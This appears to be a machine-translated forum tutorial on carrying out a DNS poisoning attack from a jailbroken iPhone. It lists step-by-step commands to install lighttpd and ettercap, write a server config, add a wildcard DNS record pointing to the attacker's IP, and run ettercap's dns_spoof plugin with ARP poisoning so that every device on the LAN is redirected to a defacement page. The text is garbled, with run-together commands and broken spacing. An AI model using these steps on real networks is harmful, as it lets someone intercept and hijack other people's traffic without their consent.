I just saw an original dns poisoning attack on ios on skey. It's good. mark it;
First, we recommend a software source for Cydia: ininjas.com/repo.
You can find some basic network security tools, such as dsniff, set, msf, nmap...
You can check the details of DNS poisoning and ettercap.
After adding the software source, we use iSSH to open a local terminal (openssh must be installed. The specific method is Baidu). Enter:
Apt-get install lighttpd nano ettercap-no-gtk # install a web server and text editor with ettercapmkdir/var/web # create a folder named web cd/var/web # go this directory is nano lighttpd. conf # create a project named lighttpd. conf file and enter the editing mode
Paste the following code into the terminal:
Server. modules = ("mod_fastcgi", "mod_access", "mod_accesslog", "mod_cgi") Specify the server.doc ument-root = "/var/web/" # website root directory server. errorlog = var. CWD + "/lighttpd. errors "# storage location of error logs
Server. port = 80 # default port, which generally does not need to be set. You have commented out server. bind = "192.168.43.45" # Host IP address. Generally, you do not need to set it. You have commented out it.
Index-file.names = ("index. php "," index.html "," index.htm "," default.htm ") # default homepage mimetype. assign = (". html "=>" text/html ",". htm "=>" text/html ") # format resolution server. event-handler = "freebsd-kqueue" # Software Platform
Figure 1
Press ctrl + o to save the file, and press ctrl + x to exit (the ctrl key is in the-number in the upper left corner)
Continue input:
Nano/usr/local/share/ettercap/etter. dns
Move the cursor to the last line with the direction key (in the-sign in the upper left corner) and enter:
.. * A's own ip Address
Figure 2
Ctrl + o ctrl + x save and exit
Next, you can use ifile to put your own black pages into/var/web, where I simply wrote a web page
Okay, so the next step is the major event. Enter at the terminal:
Lighttpd-f/var/web/lighttpd. conf # enable the web server ettercap-T-q-P dns_spoof-M arp: remote // # parameter-T uses the text mode, and-q does not display back, -P: Use plug-ins in-M Running Mode
Figure 3
After loading, any website opened on the same LAN device will go to this black page, and all client software will not be able to obtain new data, so you have successfully implemented a DNS poisoning attack.
Figure 4
Figure 5